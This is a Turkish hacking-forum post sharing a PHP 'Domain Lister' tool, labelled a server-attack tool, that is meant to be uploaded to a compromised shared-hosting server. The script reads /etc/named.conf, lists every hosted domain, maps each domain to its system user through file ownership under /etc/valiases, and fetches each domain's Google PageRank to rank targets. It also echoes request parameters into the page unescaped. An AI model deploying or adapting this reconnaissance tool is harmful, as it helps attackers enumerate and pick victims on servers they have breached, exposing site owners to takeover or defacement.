G3nzo
Moderator
- Katılım
- 20 Eyl 2012
- Mesajlar
- 1,992
- Tepkime puanı
- 0
- Puanları
- 36
Kod:
<title>Ajanlar Priv Forum</title>
</center><center><font face="courier new"><body bgcolor="black"><font color="red"><p><p><p><br><img src="http://3.bp.blogspot.com/-pcMwozmf9BY/TywUq20D7pI/AAAAAAAAApk/OoVsvjPk_pY/s200/spybot.png"></img><p>
<center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:white"><font color=red>m4rc0-security.blogspot.com </h2><br>
<FONT FACE="tahoma" color="#999999"> <center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:white"><font color=red>| Ajanlar Domain Lister|<P>Coded By xatlivacip</h3><h3>-----------------------------------------------------------------------<h3><FONT FACE="tahoma" color="#999999"> <center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:white"><font color=red>TurkisH HackeR||Muslim HackeR</h3>
<BODY OnKeyPress="GetKeyCode();" text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=0 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="100%" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><center><font color="#0033FF">
<pre><center><br></span><span style="font-weight:bold; text-shadow:white 0px 0px 8px; color:white"><font color=red>#Priv 2012 Server Attack <---- m4rc0-security.blogspot.com/#</pre>
<hr>
</font>
<?php
class pr
{
protected $url = '';
protected $method = '';
protected $width = '';
protected $image_location = '';
public function __construct($url,$method,$width,$image_location)
{
$this->url = $url;
$this->method = $method;
$this->width = $width;
$this->image_location = $image_location;
}
public function pagerank()
{
//Check url has http://
// If not add http:// in url
if (!preg_match('/^(http:\/\/)?([^\/]+)/i', $this->url)) { $this->url='http://'.$this->url;}
//Function calculates Page Rank
$page_rank = $this->getPageRank();
$pagerank = "PageRank : $page_rank/10";
//Image Method
if ($this->method == 'image') {
header("Cache-Control: no-cache, must-revalidate");
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
$pr = imagecreatefrompng($this->image_location."/pr/pr_$page_rank.png");
imagepng($pr);
}
//CSS Method
else if($this->method == "css") {
$prpercent = 100 * $page_rank / 10;
$html='<a href="javascript: void(0)" title="'.$pagerank.'"><div style="position: relative; width: '.$this->width.'px; padding: 0; background: #D9D9D9;"><strong style="width: '.$prpercent.'%; display: block; position: relative; background: #5EAA5E; text-align: center; color: #333; height: 10px; line-height: 10px;"><span></span></strong></div></a>';
return $html;
}
else {
$pr_positive = $this->width * $page_rank / 10;
$pr_negative = $this->width - $pr_positive;
$html='<a href="javascript: void(0)" title="'.$pagerank.'"><img src="'.$this->image_location.'/green.jpg" width='.$pr_positive.' height="15" border="0" alt="'.$pagerank.'"><img src="'.$this->image_location.'/gray.jpg" width='.$pr_negative.' height="15" border="0" alt="'.$pagerank.'"></a>';
return $html;
}
}
public function getPageRank()
{
$ch = $this->getCheckSum();
$google_toolbar = 'toolbarqueries.google.com';
$referrer = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5';
$fp = fsockopen($google_toolbar, 80, $errno, $errstr, 30);
if ($fp) {
$out = "GET /search?client=navclient-auto&ch=$ch&features=Rank&q=info:$this->url HTTP/1.1\r\n";
$out .= "User-Agent: $referrer\r\n";
$out .= "Host: $google_toolbar\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$data = fgets($fp, 128);
$pos = strpos($data, "Rank_");
if($pos === false){} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("\n",'',$pr);
return $pr;
}
}
fclose($fp);
}
}
public function getCheckSum()
{
//return the pagerank checksum hash
$hash = $this->hashURL();
return $this->checkHash($hash);
}
public function StrToNum($Str, $Check, $Magic) {
$Int32Unit = 4294967296; // 2^32
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
//if the check less than -2^31
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
//This function generates hash for the url
function hashURL() {
$Check1 = $this->StrToNum($this->url, 0x1505, 0x21);
$Check2 = $this->StrToNum($this->url, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
//genearate a checksum for the hash string
function checkHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length - 1; $i >= 0; $i --) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
}
?>
<html>
<head>
<title>Domain ve User ListeLiyici | by Ajanlar.;ßorg </title>
<style>*{ font-family:tahoma; font-size:12; } td,tr{ text-align:center;}</style>
</head>
<body>
<center>
<p>Domain ve User ListeLiyici | by Ajanlar.org </p>
<p>[ <a target="_blank" href='?ShowAll'>Tum DomainLer</a> ] - [ <a target="_blank" href='?UserDomains'>Kullanici DomainLerini Listele</a> ] - [ <a target="_blank" href='?DomainUser'>Domain KullaniciLarini Listele </a> ]- [ <a target="_blank" href='?pr'> PageRank SorguLa </a> ]</p>
<?
$file = @implode(@file("/etc/named.conf"));
if(!$file){ die("# okunamiyorr -> [ /etc/named.conf ]"); }
preg_match_all("#named/(.*?).db#",$file ,$r);
$domains = array_unique($r[1]);
if(isset($_GET['ShowAll'])){
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] Serverda : [ <b>".count($domains)."</b> ] Domain Bulunuyor..</td></tr>
<tr><td>Domain</td><td>kullanıcı adı</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo "<tr><td><a href=\"http://$domain\" target=\"_blank\" >$domain</a> </td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
if(isset($_GET['UserDomains'])){
echo "
<form action='?UserDomains' method='GET'>
<input type=hidden name=UserDomains value=1>
K. Adi : <input type=text name=user value=$_GET[user]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['user'])){
echo "<table border=1 width=30% cellpadding=5>
<tr><td><b>Domains ..</b></td></tr>";
foreach($domains as $n=>$domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
echo ($_GET['user'] == $user['name']) ? "<tr><td>$domain</td></tr>":"";
}
echo "</table>";
}
}
if(isset($_GET['DomainUser'])){
echo "
<form action='?DomainUser' method='GET'>
<input type=hidden name=DomainUser value=1>
Domain : <input type=text name=domain value=$_GET[domain]> - <input type=submit value=Show>
</form>
";
if(isset($_GET['domain'])){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$_GET['domain']));
echo "User is : [ ".$user['name']." ]";
}
}
if(isset($_GET['pr'])){
echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] Serverda : [ <b>".count($domains)."</b> ] Domain Bulunuyor..</td></tr>
<tr><td>Domain</td><td>kullanıcı adı</td></tr>";
foreach($domains as $domain){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
$url = $domain;
$width = "200";
$method = "css"; //image or css
$image_location = "http://www.turkiyewebservisi.com/images";
$obj = new pr($url,'normal',50,$image_location);
echo "<tr><td><a href=\"http://$domain\" target=\"_blank\" >$domain</a> = ". $obj->pagerank() ." </td><td>".$user['name']."</td></tr>";
}
echo "</table>";
}
?>
<p><font color="#FF0000">Contact: </font>hacked_xatlivacip@hotmail.com<br>
<font color="#FF0000">Turkish</font> 2oo7-2o12</p>
</body>
</html>
<body background="http://a1209.hizliresim.com/11/l/d58fv.jpg">
<style>
body {
background-color:FFFFFF;
background-attachment: fixed;
background-position:top center;
background-repeat:repeat;
}
</style>